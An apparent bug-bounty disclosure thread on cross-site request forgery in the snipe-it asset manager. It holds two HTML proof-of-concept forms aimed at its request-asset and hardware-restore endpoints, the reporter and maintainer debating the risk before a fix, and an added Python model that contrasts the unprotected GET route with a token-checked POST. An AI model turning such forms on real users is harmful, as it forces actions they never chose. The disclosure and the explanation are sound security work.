Cross-Site Request Forgery (CSRF) in snipe/snipe-it
Reported on
Oct 4th 2021
Description
I found some low/medium-level CSRFs in the nice snipe-it application.
Proof of Concepts
Change the state of Requestable Assets:
// PoC.html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://develop.snipeitapp.com/account/request-asset/{id}">
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Restore a hardware item:
// PoC.html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://develop.snipeitapp.com/hardware/{id}/restore">
<input type="submit" value="Submit request" />
</form>
</body>
</html>
This really wouldn't apply here, since we have fine-grained permissions that wouldn't allow a logged in user to perform an action they weren't authorized to do anyway.
The CSRF attack does not need any permission.
In this kind of attack, it is enough for a logged-in user with fine-grained permissions to go to the attacker's website or click a link.
Believe me, I have reported nearly 200 CSRF vulnerabilities to many repositories. If you want more explanation, just tell me, my dear.
Please do not call me "dear". The logged in user would still have to have permission to execute the action that the form is requesting. It still has to talk to the server, and the server determines who has permission to do what.
Additionally, the Laravel framework requires a CSRF token in order to process form requests, so I'm not sure how you'd even get anything other than a 500 error.
I'm so sorry about 'dear'; I'm not a pro in English.
First, I want to be sure that you already know about CSRF attacks (excuse me for saying this).
A good reference:
https://portswigger.net/web-security/csrf
Well, if a user that already has permission to execute the action, or even the admin or superuser, goes to the attacker's website or clicks on a crafted link, then the action is sent to the server as that user, admin or superuser, because the request is sent to the server as the user who has the permission.
Thanks for the validation. If you want to know more about my report, just tell me and I will create a video PoC.
If possible, tell me what I can call you next time?
Best regards.
No problem re: "dear" - but women in the US don't like to be called "dear" by strangers. It comes off as condescending.
I know what CSRFs are. This just doesn't seem very high risk, since the worst you can do is restore an asset that was deleted. In context, this isn't really that big of a risk.
We'll patch it anyway, but there's limited harm you could do.
Calling me by my name/handle would suffice, thanks for asking.
I should have a PR up shortly.
I have a PR up as a fix for this, but it will be on demo.snipeitapp.com (the master branch), not develop, which is considered unstable and not fit for production currently. The fix on master is still going through QA but should be out shortly.
This is now fixed on demo.snipeitapp.com. It will not appear on develop until the two branches are merged, which will not be for another few weeks, as develop is not stable and not meant for use in production under any circumstances.
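The disagreement in this thread (whether the victim's permissions and Laravel's token check stop the PoC) comes down to one detail: Laravel's VerifyCsrfToken middleware only checks POST/PUT/PATCH/DELETE, so a state-changing GET route is authorized by the session cookie alone. The model below is an added example written for this page; it is not snipe-it or Laravel code, and all names, the session store and the asset record are constructed. It runs the original GET route and a token-guarded POST route against the same four situations: the PoC form from a cross-origin page, the same form with the fixed route, a legitimate same-origin submit, and a user without the permission.

```python
"""
Model of the two server behaviours discussed above (added example, not snipe-it or
Laravel code): the original GET /hardware/{id}/restore, which checks session and
permission only, versus the same action as POST guarded by a per-session
synchronizer token. All names and data here are constructed for illustration.
"""
import secrets

# Constructed sessions: alice legitimately holds the restore permission, bob does not.
# The browser attaches the session cookie to every request to the site, including
# requests that a page on another origin triggers.
SESSIONS = {
    "sess-alice": {"user": "alice", "perms": {"hardware.restore"},
                   "csrf": secrets.token_hex(16)},
    "sess-bob": {"user": "bob", "perms": set(), "csrf": secrets.token_hex(16)},
}


def fresh_assets():
    """One soft-deleted asset, recreated per scenario."""
    return {42: {"deleted": True}}


def _authorize(cookie, perm):
    """Session + permission check shared by both route versions."""
    sess = SESSIONS.get(cookie)
    if sess is None:
        return None, (302, "redirect to login")
    if perm not in sess["perms"]:
        return None, (403, "forbidden")
    return sess, None


def restore_get(assets, cookie, asset_id):
    """Original route shape: GET. Laravel's VerifyCsrfToken middleware skips
    GET/HEAD/OPTIONS, so once the session holds the permission the action runs
    whether or not the user intended it."""
    _, err = _authorize(cookie, "hardware.restore")
    if err:
        return err
    assets[asset_id]["deleted"] = False
    return (200, "restored")


def restore_post(assets, cookie, asset_id, form):
    """Fixed route shape: POST carrying the session's token in the _token field
    (what Laravel's @csrf directive renders). A page on another origin cannot read
    the victim's token, so it cannot supply a matching value."""
    sess, err = _authorize(cookie, "hardware.restore")
    if err:
        return err
    supplied = form.get("_token", "")
    if not secrets.compare_digest(supplied, sess["csrf"]):
        return (419, "token mismatch")  # Laravel's status for TokenMismatchException
    assets[asset_id]["deleted"] = False
    return (200, "restored")


def scenario_cross_site_get():
    """The thread's PoC against the original route: a form on another origin submits
    to the restore URL, the browser adds alice's cookie, no token is involved."""
    assets = fresh_assets()
    status, _ = restore_get(assets, "sess-alice", 42)
    return status, assets[42]["deleted"]


def scenario_cross_site_post():
    """Same form pointed at the fixed route: the cookie still arrives, but the
    attacker's page has no way to fill in _token."""
    assets = fresh_assets()
    status, _ = restore_post(assets, "sess-alice", 42, {})
    return status, assets[42]["deleted"]


def scenario_legitimate_post():
    """The application's own page renders the token into its form, so the user's
    deliberate action goes through."""
    assets = fresh_assets()
    form = {"_token": SESSIONS["sess-alice"]["csrf"]}
    status, _ = restore_post(assets, "sess-alice", 42, form)
    return status, assets[42]["deleted"]


def scenario_no_permission_get():
    """The maintainer's point: without the permission the action fails on either
    route. CSRF only lets a third party spend a permission the victim already has."""
    assets = fresh_assets()
    status, _ = restore_get(assets, "sess-bob", 42)
    return status, assets[42]["deleted"]


if __name__ == "__main__":
    for fn in (scenario_cross_site_get, scenario_cross_site_post,
               scenario_legitimate_post, scenario_no_permission_get):
        status, still_deleted = fn()
        print(f"{fn.__name__}: status={status} deleted={still_deleted}")
```

The two results that matter for triage are the first and the last: the GET route restores the asset with nothing but the victim's cookie, while the unprivileged session is refused on both routes. That is why both parties are right in part: the permission model bounds the damage to what the victim could already do, and the token check only helps once the action is moved off GET.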